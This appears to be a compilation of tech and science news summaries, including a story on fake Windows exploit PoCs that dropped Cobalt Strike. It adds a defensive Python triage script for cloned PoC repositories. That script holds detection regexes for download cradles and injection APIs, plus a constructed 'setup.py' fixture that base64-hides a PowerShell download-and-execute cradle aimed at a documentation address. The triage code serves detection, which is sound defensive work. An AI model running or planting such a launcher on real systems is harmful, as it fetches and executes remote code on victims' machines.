Instead of getting an exploit PoC, researchers are getting something a lot more sinister:
It's common practice for researchers to publish a PoC [Proof-of-Concept] of recently patched flaws on code repositories, such as GitHub. That way, they can test different solutions among themselves and force admins to apply the fixes as soon as possible.
When Microsoft patched two remote code execution vulnerabilities, tracked as CVE-2022-24500 and CVE-2022-26809, a few PoCs popped up on GitHub, one of them coming from an account named "rkxxz".
However, the PoC turned out to be bogus, and what it did instead was install Cobalt Strike beacons on the researchers' endpoints. [...]
Fake Windows exploits target infosec community with Cobalt Strike:
This is not the first time threat actors have targeted vulnerability researchers and pentesters.
In January 2021, the North Korean Lazarus hacking group targeted vulnerability researchers through social media accounts and zero-day browser vulnerabilities.
In March 2021, North Korean hackers again targeted the infosec community by creating a fake cybersecurity company called SecuriElite (located in Turkey).
In November, the Lazarus hacking group conducted another campaign using a trojanized version of the IDA Pro reverse engineering application that installed the NukeSped remote access trojan.
By targeting the infosec community, threat actors not only gain access to vulnerability research the victim may be working on but may also potentially gain access to a cybersecurity company's network.
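The check a reviewer wants before running anyone's PoC: a static triage pass over the cloned repository that lists the lines worth reading first (download cradles, execution of decoded data, process-injection APIs, hard-coded URLs, prebuilt binaries) and decodes any long Base64 run to see whether it hides a PE image or a script. This is an added example, not code from the article or from the repository it describes; the rules are generic heuristics, the sample repository and its files are constructed here, and 203.0.113.10 is an RFC 5737 documentation address, so nothing in it points at a live host.

```python
"""Static triage of a freshly cloned exploit PoC, run before anything in it is
executed anywhere but a disposable VM.  Every sample file below is constructed."""
import base64
import binascii
import re
from dataclasses import dataclass

CODE_SUFFIXES = (".py", ".ps1", ".bat", ".cmd", ".sh", ".c", ".cpp", ".cs", ".js", ".vbs", ".rb", ".go")
BINARY_SUFFIXES = (".exe", ".dll", ".bin", ".so", ".scr")

# Lines that deserve a human read before anything runs.  Genuine PoCs hit some of
# these too (a real RCE PoC may well call VirtualAlloc), so the output is a reading
# list for the reviewer; only the HIGH rules below are treated as a verdict.
RULES = {
    "download-cradle": re.compile(
        r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|wget|curl|urlretrieve|urlopen|requests\.get)\b", re.I),
    "encoded-powershell": re.compile(r"powershell(?:\.exe)?\b.*?\s-e(?:nc|ncodedcommand)?\b", re.I),
    "exec-of-decoded-data": re.compile(
        r"\b(?:exec|eval|subprocess\.\w+|os\.system|os\.popen)\s*\(.*?(?:b64decode|fromhex|zlib|codecs\.decode)", re.I),
    "memory-injection-api": re.compile(
        r"\b(?:VirtualAlloc(?:Ex)?|VirtualProtect|WriteProcessMemory|CreateRemoteThread|NtAllocateVirtualMemory)\b"),
    "remote-url": re.compile(r"https?://[^\s'\"<>)]+"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
SCRIPT_MARKERS = ("powershell", "iex", "invoke-expression", "downloadstring", "frombase64string")
HIGH = {"prebuilt-binary", "base64-pe-payload", "base64-hidden-script", "exec-of-decoded-data", "encoded-powershell"}

@dataclass(frozen=True)
class Finding:
    rule: str
    path: str
    line_no: int   # 0 for whole-file findings
    excerpt: str

def inspect_blob(blob):
    """Decode a long base64 run and say what it hides: a PE image, a script, or nothing."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw.startswith(b"MZ"):
        return "base64-pe-payload"
    texts = [raw.decode("utf-8", errors="ignore").lower()]
    if len(raw) % 2 == 0:                      # -EncodedCommand payloads are UTF-16LE
        texts.append(raw.decode("utf-16-le", errors="ignore").lower())
    if any(marker in text for text in texts for marker in SCRIPT_MARKERS):
        return "base64-hidden-script"
    return None

def triage_file(path, data):
    findings = []
    if path.lower().endswith(BINARY_SUFFIXES) or data.startswith(b"MZ"):
        return [Finding("prebuilt-binary", path, 0, data[:4].hex())]
    if not path.lower().endswith(CODE_SUFFIXES):
        return findings
    for n, line in enumerate(data.decode("utf-8", errors="replace").splitlines(), 1):
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append(Finding(rule, path, n, line.strip()[:80]))
        for blob in B64_BLOB.findall(line):
            hidden = inspect_blob(blob)
            if hidden:
                findings.append(Finding(hidden, path, n, blob[:24] + "..."))
    return findings

def triage_repo(files):
    """files: {relative path: bytes}.  Returns (verdict, findings)."""
    findings = [f for path, data in sorted(files.items()) for f in triage_file(path, data)]
    rules = {f.rule for f in findings}
    if rules & HIGH:
        verdict = "HIGH: hidden payload or execution of decoded data; treat as malware until proven otherwise"
    elif rules:
        verdict = "REVIEW: read every flagged line before running, in a disposable VM only"
    else:
        verdict = "NO FLAGS: still run only in a disposable VM"
    return verdict, findings

# Constructed sample repository, not the real rkxxz repository.  203.0.113.10 is a
# documentation address (RFC 5737), so nothing here points at a live host.
_CRADLE = "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.10/b')\""
SAMPLE_REPO = {
    "poc/exploit.py": (
        "import socket, sys\n"
        "# sends the crafted request to the host named on the command line\n"
        "s = socket.create_connection((sys.argv[1], 445), timeout=5)\n"
        "s.sendall(b'\\x00' * 64)\n").encode(),
    "poc/setup.py": (
        "import base64, subprocess\n"
        "# 'dependency check' that is really a hidden launcher\n"
        f"subprocess.Popen(base64.b64decode('{base64.b64encode(_CRADLE.encode()).decode()}').decode(), shell=True)\n").encode(),
    "poc/helper.exe": b"MZ\x90\x00" + b"\x00" * 60,
}

if __name__ == "__main__":
    verdict, findings = triage_repo(SAMPLE_REPO)
    print(verdict)
    for f in findings:
        print(f"  {f.rule:22} {f.path}:{f.line_no}  {f.excerpt}")
```

Run it over the clone (read each file into the dict) on the analysis VM, not on the workstation that holds your research. The point of the blob decoder is that a launcher hidden in a "setup" or "dependency" script never shows the word powershell in clear text; the plain exploit file in the sample produces no findings at all, which is what a real PoC for a network-facing bug usually looks like.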
An interesting story from history about a French embroiderer who helped revolutionize surgery:
On June 25, 1894, the French President Marie François Sadi Carnot attended a banquet at the Chamber of Commerce in Lyon. [...] One man present, Sante Geronimo Caserio, [...] revealed a dagger, which he plunged deep into Carnot's back. [...]
The surgical trainee Alexis Carrel was, like his fellow countrymen, appalled by the assassination, but he directed his ire not towards things Italian, rather the impotence of his profession. Carrel believed that, if only Carnot's doctors had possessed the skill, they'd have been able to save the president's life.
[...] He soon found that, even with recent advances in surgery, the thread surgeons used was too thick for tiny blood vessels, which would easily tear. The needles were too bulky, too, [...] If he was going to attempt to sew vessels together, he would need better. With nothing very delicate available at surgical suppliers of the time, Carrel turned to Lyon's famous embroiderers. [...]
The woman he went to see was called Marie-Anne Leroudier, one of Lyon's finest embroiderers. Leroudier isn't always mentioned in Carrel's biographies. [...] But if you take the trouble to look up her work, it's unfathomably intricate. [...]
Fleur Oakes, formerly the Embroiderer in Residence at the vascular surgery department at St Mary's Hospital in London, explains what Leroudier would have been able to impart to Carrel—knowledge that he wouldn't have been able to pick up elsewhere. This ranged from what she called 'thread management' (making the thread go where you want it to go) to ways of working one-handed and ways of achieving the intricacy required to work on tiny structures like veins and arteries.
In 1902 he presented his technique at scientific meetings in Lyon and published a paper on his findings. Being able to sew blood vessels together in the way Carrel described would revolutionize trauma surgery. [...]
Carrel would later go on to modify the technique further and it became the basis for much of vascular surgery, including bypass surgery. [...]
Transplants existed for centuries before Carrel, of course, but it was the application of techniques from embroidery—and particularly the uncredited Marie-Anne Leroudier—that made the internal organs no longer off limits to aspiring transplant surgeons.
This story comes from the book SPARE PARTS by Paul Craddock.
High cost of cancer care in the U.S. doesn't reduce mortality rates:
While the U.S. spends twice as much on cancer care as the average high-income country, its cancer mortality rates are only slightly better than average, according to a new analysis by researchers at Yale University and Vassar College.
[...] The researchers found that national cancer care spending showed no relationship to population-level cancer mortality rates. "In other words, countries that spend more on cancer care do not necessarily have better cancer outcomes," said Chow.
[...] Smoking is the strongest risk factor for cancer mortality, and smoking rates have historically been lower in the United States, compared to other countries. When the researchers controlled for international variations in smoking rates, U.S. cancer mortality rates became no different than the average high-income country, with nine countries — Australia, Finland, Iceland, Japan, Korea, Luxembourg, Norway, Spain, and Switzerland — having lower smoking-adjusted cancer mortality than the United States.
[...] "The pattern of spending more and getting less is well-documented in the U.S. healthcare system; now we see it in cancer care, too," said co-author Elizabeth Bradley, president of Vassar College and professor of science, technology, and society. "Other countries and systems have much to teach the U.S. if we could be open to change."
Journal Reference:
Ryan D. Chow, Elizabeth H. Bradley, Cary P. Gross. Comparison of Cancer-Related Spending and Mortality Rates in the US vs 21 High-Income Countries, JAMA Health Forum. 2022;3(5):e221229. DOI:10.1001/jamahealthforum.2022.1229
A digital certificate that expired after 10 years is causing a major outage in German retail payment handling. The involved Verifone H5000 card reader was introduced in 2012 but is still widely in use. Acceptance points have been advised to not power off their devices, because on startup, the failing certificate locks out the device even from updates. The vendor is trying to come up with a solution, which will likely involve USB sticks for local updates.
Report in English: https://www.stripes.com/theaters/europe/2022-05-27/aaefes-esso-credit-card-outage-6146620.html
Details in German (with screenshots): https://www.borncity.com/blog/2022/05/27/strung-der-verifone-h5000-ec-kartenlesegerte-einige-insights-zur-zertifikateproblematik/
While in the past, many issues could be fixed by cleverly scraping together remaining data, this is one of the first nationwide occurrences of a new class of security-related bugs that actively lock out any solution attempt. What is your experience in this field?
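The check that would have shown this coming: an expiry audit over the fleet's certificates, so that terminals already past notAfter are kept powered on until they have the fix and the rest get a warning window. This is an added example, not Verifone's, borncity's or Stars and Stripes' code, and the page does not say which certificate on the H5000 expired, so it models only the expiry check, not the device. The parser is a minimal DER walk over the standard X.509 field order and works on real DER or PEM certificates; the skeleton certificates, device ids, dates and the 90-day window are constructed here for the test.

```python
"""Certificate-expiry audit for a device fleet.  Added example for this story; it is
not Verifone's or borncity's code.  The parser reads real DER/PEM certificates; the
"certificates" built by skeleton_cert() are constructed, unsigned test data."""
import base64
import re
from datetime import datetime, timedelta, timezone

UTC_TIME, GENERALIZED_TIME, CONTEXT_0 = 0x17, 0x18, 0xA0

def der_tlv(buf, pos):
    """Parse the DER tag-length-value at pos; return (tag, value_start, value_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: 0x8N, then N length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, pos, pos + length

def der_children(buf, start, end):
    """Yield the TLVs directly inside a constructed element's value range."""
    pos = start
    while pos < end:
        tag, vs, ve = der_tlv(buf, pos)
        yield tag, vs, ve
        pos = ve

def parse_der_time(tag, raw):
    """X.509 Time: UTCTime YYMMDDHHMMSSZ (RFC 5280: 50-99 are 19xx) or GeneralizedTime."""
    s = raw.decode("ascii")
    if tag == UTC_TIME:
        yy = int(s[:2])
        s = f"{1900 + yy if yy >= 50 else 2000 + yy}{s[2:]}"
    elif tag != GENERALIZED_TIME:
        raise ValueError(f"unexpected Time tag 0x{tag:02x}")
    return datetime.strptime(s, "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)

def cert_validity(der):
    """Return (notBefore, notAfter) from a DER-encoded X.509 certificate."""
    _, cert_vs, cert_ve = der_tlv(der, 0)                             # Certificate
    _, tbs_vs, tbs_ve = next(der_children(der, cert_vs, cert_ve))     # tbsCertificate
    fields = list(der_children(der, tbs_vs, tbs_ve))
    if fields[0][0] == CONTEXT_0:           # optional EXPLICIT [0] version
        fields = fields[1:]
    _, val_vs, val_ve = fields[3]           # serialNumber, signature, issuer, validity
    (t0, s0, e0), (t1, s1, e1) = list(der_children(der, val_vs, val_ve))[:2]
    return parse_der_time(t0, der[s0:e0]), parse_der_time(t1, der[s1:e1])

def pem_to_der(pem):
    return base64.b64decode(re.sub(r"-----[^-]+-----|\s", "", pem))

def der_to_pem(der_bytes):
    body = base64.encodebytes(der_bytes).decode()   # 76-char lines, newline-terminated
    return f"-----BEGIN CERTIFICATE-----\n{body}-----END CERTIFICATE-----\n"

def fleet_report(inventory, now, warn_days=90):
    """inventory: {device_id: DER bytes}.  Returns {device_id: (days_left, status)}.
    A device whose status is EXPIRED must not be rebooted until it has been updated."""
    report = {}
    for device, der in inventory.items():
        _, not_after = cert_validity(der)
        days = (not_after - now).days
        status = "EXPIRED" if not_after <= now else "WARN" if days < warn_days else "OK"
        report[device] = (days, status)
    return report

# ---- constructed test data ------------------------------------------------------
def der_encode(tag, content):
    """Minimal DER encoder used only to build the skeletons below."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content

def skeleton_cert(not_before, not_after):
    """Certificate/TBSCertificate framing with a genuine Validity, a placeholder
    issuer/subject Name and an empty signature: enough to exercise cert_validity()."""
    def utc(d):
        return der_encode(UTC_TIME, d.strftime("%y%m%d%H%M%SZ").encode())
    alg = der_encode(0x30, der_encode(0x06, bytes.fromhex("2a864886f70d01010b")) + der_encode(0x05, b""))
    name = der_encode(0x30, der_encode(0x31, der_encode(0x30,
           der_encode(0x06, bytes.fromhex("550403")) + der_encode(0x0C, b"Terminal Update CA"))))
    tbs = der_encode(0x30, der_encode(CONTEXT_0, der_encode(0x02, b"\x02")) + der_encode(0x02, b"\x01")
                     + alg + name + der_encode(0x30, utc(not_before) + utc(not_after)) + name
                     + der_encode(0x30, b""))
    return der_encode(0x30, tbs + alg + der_encode(0x03, b"\x00"))

NOW = datetime(2022, 5, 28, tzinfo=timezone.utc)
SAMPLE_FLEET = {
    "h5000-0001": skeleton_cert(NOW - timedelta(days=3653), NOW - timedelta(days=1)),   # expired yesterday
    "h5000-0002": skeleton_cert(NOW - timedelta(days=3600), NOW + timedelta(days=30)),  # inside warn window
    "h5000-0003": skeleton_cert(NOW, NOW + timedelta(days=3650)),                      # freshly issued
}

if __name__ == "__main__":
    for device, (days, status) in fleet_report(SAMPLE_FLEET, NOW).items():
        print(f"{device}  {status:8} {days:+5d} days")
```

The design caveat the outage illustrates is independent of the audit: a device that validates its update channel against a credential it cannot renew on its own is one reboot away from being unrecoverable once that credential expires, so the recovery path (here apparently a USB stick) has to be anchored in something longer-lived than the certificate it is meant to replace.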
Knowledge-Diverse Work Teams Benefit from Fluid Hierarchies:
Co-workers who team up to solve problems or work on projects can benefit when they have less in common and take turns spotlighting their different expertise, according to new research from The University of Texas at Austin. The findings have implications for how managers can better form and manage teams so all voices are heard.
Groups of workers with varied knowledge — or "knowledge-diverse teams" — share more information among group members, a key trait of effective teamwork. [...]
"For teams, instability is often seen as a negative," Gray said. "But we found a scenario in which instability is helpful. Within a diverse team, this type of fluidity helps members bolster their position and standing by demonstrating their expertise and unique value."
Even so, homogenous teams — ones made up of members with similar knowledge and skills — share more when members' influence over time is stable.
A knowledge-diverse new product development team could include a scientist, engineer, operations expert and a marketer, while a startup team may have a chief technology officer, chief marketing officer and chief financial officer. In contrast, a homogenous team might be made of sales members who do the same task but may have different kinds of customers.
[...] Workers who are a part of a knowledge-diverse team where influence diverges should know that by sharing information, they can demonstrate their worth to co-workers and gain greater influence and trust within the team. Gray said managers need to understand that it's insufficient to bring together people with diverse knowledge and simply set them on a task. Instead, managers of knowledge-diverse teams need to think about how they can help to elevate different viewpoints as tasks evolve. Managers of homogenous teams should mull how they might promote stability so members don't compete for status.
What were the makeups of the best and worst collaborative teams you've worked on? Is any of this important, or do the variabilities in skills and experience between people wash all this out and team effectiveness is just one big stochastic crapshoot?
Journal Reference:
Steven M. Gray et al., Leveraging Knowledge Diversity in Hierarchically Differentiated Teams: The Critical Role of Hierarchy Stability, Acad Manage J, 2022
DOI: 10.5465/amj.2020.1136
Climate change reveals unique artifacts in melting ice patches:
Sometime around 2000 BCE, a red-wing thrush died at Skirådalskollen in the Dovrefjell mountain range. Its small body quickly became buried under an ice patch. Upon emerging again 4,000 years later, its internal organs are still intact.
In recent years, hundreds of such discoveries have been made in ice patches, revealing traces of hunting, trapping, traffic, animals and plant life -- small, frozen moments of the past.
[...] "A survey based on satellite images taken in 2020 shows that more than 40 per cent of 10 selected ice patches with known finds have melted away. These figures suggest a significant threat for preserving discoveries from the ice, not to mention the ice as a climate archive," says Skar.
"The time is ripe for establishing a national monitoring programme using remote sensing and systematically securing archaeological finds and biological remains from ice patches. We should also use this programme to collect glaciological data from different parts of the country, since the ice patches can provide detailed data on how the climate has evolved over the last 7500 years," she said.
[...] "We used to think of the ice as desolate and lifeless and therefore not very important. That's changing now, but it's urgent. Large amounts of unique material are melting out and disappearing forever. Finds can provide important information about the history of both people and nature," he said.
Quantum information teleported across a rudimentary quantum network:
The power of a future quantum Internet is based on the ability to send quantum information (quantum bits) between the nodes of the network. This will enable all kinds of applications such as securely sharing confidential information, linking several quantum computers together to increase their computing capability, and the use of highly precise, linked quantum sensors.
[...] In order to be able to teleport quantum bits, several ingredients are required: a quantum entangled link between the sender and receiver, a reliable method for reading out quantum processors, and the capacity to temporarily store quantum bits. Previous research at QuTech demonstrated that it is possible to teleport quantum bits between two adjacent nodes. The researchers at QuTech have now shown for the first time that they can meet the package of requirements and have demonstrated teleportation between non–adjacent nodes, in other words over a network. They teleported quantum bits from node "Charlie" to node "Alice", with the help of an intermediate node "Bob".
Also included is an explanatory video.
See also:
The New York Times, El Pais, New Scientist (international edition), De Volkskrant, hardware.info, Nature News & Views, and Physics World
Journal Reference:
S.L.N. Hermans et al., Qubit teleportation between non-neighboring nodes in a quantum network, Nature, 2022, DOI: 10.1038/s41586-022-04697-y
https://phys.org/news/2022-05-disinformation-flourished-pandemic.html
A small team of researchers at Sony Computer Science Laboratories in France has explored why disinformation seemed to flourish during the global pandemic.
One of the more remarkable features of the global pandemic is the seemingly unceasing stream of misinformation attributed not just to the virus and the people who were being infected, but in the ways the medical community has responded to the threat. From ridiculous claims regarding supposed cures to the baseless claims made by anti-vaxxers, misinformation has flourished. In this new effort, the researchers wondered why this has been happening and they looked at the sources of news, both reliable and unreliable, as participants in a supply and demand news ecosystem.
[...] The researchers were not able to ascertain why the unreliable news sources were able to respond more quickly, but suggest that the end result was higher visibility for unreliable sources, leading to widespread disinformation gaining traction, and ultimately, acceptance.
Journal Reference:
Pietro Gravino et al., The supply and demand of news during COVID-19 and assessment of questionable sources production, Nature Human Behaviour (2022). DOI: 10.1038/s41562-022-01353-3
Do you agree with this assessment?
Why are male mice afraid of bananas?:
Researchers from McGill University have identified a form of chemical signaling in mice to defend their offspring. The researchers found that proximity to pregnant and lactating female mice increased stress hormones in males and even decreased their sensitivity to pain.
"The findings have important implications for improving the reliability and reproducibility of experiments involving mice. This is yet another example of a previously unknown factor in the lab environment that can affect the results of scientific studies," says Jeffrey Mogil, a Professor in the Department of Psychology at McGill University and E. P. Taylor Chair in Pain Studies.
According to co-author Sarah Rosen, "what is likely happening is that female mice are signaling to males who might be considering attacking their babies that they will defend them vigorously. It's the threat of the possible upcoming fight that causes the stress."
"Mice have richer communication with one another than we think; it's just that a lot of it's through smell," says Mogil. The researchers started looking for the olfactory chemical responsible. Several odorants were identified, but one, n-pentyl acetate, which is released in the urine of pregnant and lactating female mice, was especially effective at producing stress in male mice.
"Curiously, n-pentyl acetate is also responsible for the unique smell of bananas. After a quick trip to the supermarket for some banana oil, we were able to confirm that the smell of banana extract stressed the male mice just as much as the pregnant females," says co-author Lucas Lima.
Journal Reference:
Sarah F. Rosen et al, Olfactory exposure to late-pregnant and lactating mice causes stress-induced analgesia in male mice, Science Advances (2022) (DOI: 10.1126/sciadv.abi9366)
Clearview AI fined in UK for illegally storing facial images:
Facial recognition company Clearview AI has been fined more than £7.5m by the UK's privacy watchdog and told to delete the data of UK residents.
The company gathers images from the internet to create a global facial recognition database.
The Information Commissioner's Office (ICO) says that breaches UK data protection laws. It has ordered the firm to stop obtaining and using the personal data of UK residents.
Clearview AI chief executive Hoan Ton-That said: "I am deeply disappointed that the UK Information Commissioner has misinterpreted my technology and intentions.
"We collect only public data from the open internet and comply with all standards of privacy and law.
Clearview AI takes publicly posted pictures from Facebook, Instagram and other sources, usually without the knowledge of the platform or any permission.
[...] John Edwards, UK information commissioner, said: "The company not only enables identification of those people, but effectively monitors their behaviour and offers it as a commercial service. That is unacceptable."
Mr Edwards continued: "People expect that their personal information will be respected, regardless of where in the world their data is being used."
The ICO said Clearview AI Inc no longer offered its services to UK organisations but, because the company had customers in other countries, it was still using personal data of UK residents.
In November 2021, the ICO said the company was facing a fine of up to £17m - almost £10m more than it has now ordered it to pay.
The UK has become the fourth country to take enforcement action against the firm, following France, Italy and Australia.
Lee Wolosky, a lawyer at American firm Jenner and Block, said: "While we appreciate the ICO's desire to reduce their monetary penalty on Clearview AI, we nevertheless stand by our position that the decision to impose any fine is incorrect as a matter of law. Clearview AI is not subject to the ICO's jurisdiction, and Clearview AI does no business in the UK at this time."
Broadcom to acquire VMware in massive $61B deal – TechCrunch:
Sometimes when there is smoke, there is actually fire. Such was the case with the rumors of Broadcom's interest in VMware this past weekend. It turns out that fire was burning hot, and today, Broadcom announced it is acquiring VMware in a massive $61 billion deal.
The deal is a combination of cash and stock, with Broadcom assuming $8 billion in VMware debt.
With VMware, Broadcom gets more than the core virtualization, which the company was built on. It also gets other pieces it acquired along the way to diversify, like Heptio for containerization, and Pivotal, which helps provide support services for companies transitioning to modern technology. At the same time it bought Pivotal, it also acquired security company Carbon Black.
That touches upon a lot of technology, but it begs the question, where does it all fit with Broadcom (which has spent a fair amount of money in recent years buying up a couple of key software pieces prior to today's announcement)?
[...] VMware CEO Raghu Raghuram put the typical positive spin on the deal about the two companies being better together. "Combining our assets and talented team with Broadcom's existing enterprise software portfolio, all housed under the VMware brand, creates a remarkable enterprise software player," he said in a statement, referring to those two other pieces Broadcom already owns.
Previously: Broadcom in Talks to Buy Cloud Computing Firm VMWare
This year is the worst start to the wildfire season in the past decade. More than 3,737 square miles (9,679 square kilometers) have burned across the U.S., almost triple the 10-year average.
With no shortage of burn scars around the West, researchers and private groups such as The Nature Conservancy have been tapping New Mexico State University's center for seedlings to learn how best to restore forests after the flames are extinguished.
The center has provided sprouts for projects in New Mexico, Arizona, Colorado, Utah, Texas and California, but experts said its capacity for turning out as many as 300,000 seedlings annually isn't enough now and certainly won't be in the future as climate change and drought persist.
[...] If the West wants to keep its forests, policymakers need to think about it in economic terms that would have significant benefits for water supplies, recreation and the rural and tribal communities that hold these mountain landscapes sacred, said Collin Haffey, forest and watershed health coordinator with the New Mexico Forestry Division.
Are direct human interventions like re-planting after forest fires enough to hold back climate change?
World's largest vertical strawberry farm opens in Jersey City:
Damn, that's sweet: Controlled environment agriculture company Oishii has opened the world's largest vertical strawberry farm at the old Anheuser-Busch factory in Jersey City, growing strawberries five rows deep in the retrofitted 74,000-square-foot facility.
The expanded growing capacity will allow the company to decrease the sticker shock on its berries, which until May 18 sold for $50 per 11-pack of medium berries at high-end grocery stores like Van Hook Cheese & Grocery in Jersey City and Montclair. As of May 19, the 11-pack price has dropped to $20, with six-berry trays at $11 and three-berry trays at $6 also available.
Making the berries more affordable was "the whole purpose" of expanding operations and focusing on efficiencies, Oishii co-founder and CEO Hiroki Koga said.
[...] "Now, it's just a matter of how quickly can we deploy these farms across the world," said Koga.
[...] The new facility won't fulfill demand for Oishii's products, and Koga said both New York metro-area farms and farms in other cities are coming down the pike. New produce is on its way, too, specifically tomatoes and melons.
Do you think this scales well and can eventually supply produce at a reasonable price, or will this always serve the niche $2/berry crowd?
FTC fines Twitter $150M for using 2FA info for targeted advertising:
The Federal Trade Commission has fined Twitter $150 million for using phone numbers and email addresses collected to enable two-factor authentication for targeted advertising.
[...] This is a direct violation of the FTC Act and a 2011 Commission administrative order which banned the company from misrepresenting its security and privacy practices and profiting from deceptively collected data.
[...] Twitter apologized for using phone numbers and email addresses provided for account security like two-factor authentication for advertising in October 2019, saying they "may have been used accidentally for ad targeting."
"We recently discovered that when you provided an email address or phone number for safety or security purposes (for example, two-factor authentication) this data may have inadvertently been used for advertising purposes, specifically in our Tailored Audiences and Partner Audiences advertising system," said the company at the time.
[...] Something very similar happened in 2018 when Facebook built complex advertising profiles for all its users with everything from their 2FA phone numbers to info harvested from their friends' profiles.
Facebook later used the users' 2FA phone numbers as an additional vector to deliver targeted ads.
Twitter to Pay $150 Million Privacy Fine as Elon Musk Deal Looms:
The FTC order also requires Twitter to notify affected consumers, alert the FTC of future data breaches and undergo independent security audits every other year for the next two decades. The company must provide users multi-factor authentication options that don't rely on phone numbers, a provision that the FTC has begun pushing this year.
The FTC approved the settlement by a unanimous 4-0 vote.
Low-cost gel film can pluck drinking water from desert air:
More than a third of the world's population lives in drylands, areas that experience significant water shortages. Scientists and engineers at The University of Texas at Austin have developed a solution that could help people in these areas access clean drinking water.
The team developed a low-cost gel film made of abundant materials that can pull water from the air in even the driest climates. The materials that facilitate this reaction cost a mere $2 per kilogram, and a single kilogram can produce more than 6 liters of water per day in areas with less than 15% relative humidity and 13 liters in areas with up to 30% relative humidity.
[...] "This new work is about practical solutions that people can use to get water in the hottest, driest places on Earth," said Guihua Yu, professor of materials science and mechanical engineering in the Cockrell School of Engineering's Walker Department of Mechanical Engineering. "This could allow millions of people without consistent access to drinking water to have simple, water generating devices at home that they can easily operate."
The researchers used renewable cellulose and a common kitchen ingredient, konjac gum, as a main hydrophilic (attracted to water) skeleton. The open-pore structure of gum speeds the moisture-capturing process. Another designed component, thermo-responsive cellulose with hydrophobic (resistant to water) interaction when heated, helps release the collected water immediately so that overall energy input to produce water is minimized.
Other attempts at pulling water from desert air are typically energy-intensive and do not produce much. And although 6 liters does not sound like much, the researchers say that creating thicker films or absorbent beds or arrays with optimization could drastically increase the amount of water they yield.
The reaction itself is a simple one, the researchers said, which reduces the challenges of scaling it up and achieving mass usage.
Journal Reference:
Youhong Guo, Weixin Guan, Chuxin Lei, et al. Scalable super hygroscopic polymer films for sustainable moisture harvesting in arid environments [open], Nature Communications (DOI: 10.1038/s41467-022-30505-2)